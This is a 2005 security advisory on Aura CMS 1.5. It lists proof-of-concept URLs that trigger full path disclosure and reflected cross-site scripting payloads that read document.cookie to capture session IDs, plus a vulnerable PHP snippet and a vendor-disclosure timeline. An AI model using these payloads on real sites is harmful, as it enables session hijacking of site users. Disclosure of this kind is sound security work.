AuraCMS.txt

`  
  
---------------------------------------------------------------------------  
Vulnerabilities in Aura CMS  
---------------------------------------------------------------------------  
  
Author: y3dips  
Date: Januari, 25th 2005  
Location: Indonesia, Jakarta  
Web: http://echo.or.id/adv/adv011-y3dips-2005.txt  
  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
auraCMS (Content Management System)  
  
version: 1.5  
date : 21 September 2004  
lisensi: GPL - http://www.gnu.org/licenses/licenses.html#GPL  
  
Author: Arif Supriyanto - [email protected]  
http://www.semarang.tk  
http://www.ayo.kliksini.com  
http://www.auracms.opensource-indonesia.com  
  
Description:  
  
auraCMS is a PHP script package that you to possiblity to building  
a website with dynamic content easier and faster, no waste time more.  
  
  
---------------------------------------------------------------------------  
  
Vulnerabilities:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
A. Full Path disclosures  
  
==>> http://[site]/[aura]/?pilih=teman&id=34%60select%20all  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in  
/home/cxxo/public_html/aura/teman.php on line 9  
  
==>> http://[site]/[aura]/?pilih=hal&id=4%60tes  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in   
/home/cxxo/public_html/aura/hal.php on line 10  
  
  
==>> http://[site]/[aura]/?pilih=arsip&topik=1%60  
  
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in   
/home/cxxo/public_html/aura/arsip.php on line 11  
  
B. Session ID  
  
CMS with This version has two method of authentication (session and cookies) ,  
this problem has found in session method .  
  
There are so many variable that havent declared yet, it makes attacker could  
exploit it by inputing some "character" n gaining an session id on windows pop up  
  
  
for eXample  
  
---- hits.php -----  
  
<?  
$perintah = "SELECT * FROM counter WHERE id=1";  
$hasil = mysql_query( $perintah );  
while ($data = mysql_fetch_row($hasil)) {  
$hits=$data[3];  
}  
  
echo "<b>$hits</b>";  
  
?>  
  
-------end -------  
  
look $hits variable , do you see something interested ? yes SIR , we've found something  
lets do some try  
  
  
==>> http://[site]/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
then you get the session ID  
  
another vulnerable :  
  
in pencarian (search) input box  
  
+ http://[site]/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search  
  
also in counter module  
  
+ http://[site]/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
  
p.s : Wanna know what session IDs gives you ? try google :D  
  
---------------------------------------------------------------------------  
  
FIx :  
  
founded : Januari 25th 2005  
reported to vendor :Februari 15th 2005  
;vendor respond but not yet releasing any patch  
publish at securityfocus : March 2th 2005  
  
  
  
---------------------------------------------------------------------------  
  
Shoutz:  
~~~~~~~  
  
~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous  
~ [email protected] ,http://forum.ehco.or.id  
~ #e-c-h-o@DALNET  
  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
y3dips || echo|staff || y3dips[at]gmail[dot]com  
Homepage: http://y3dips.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
  
`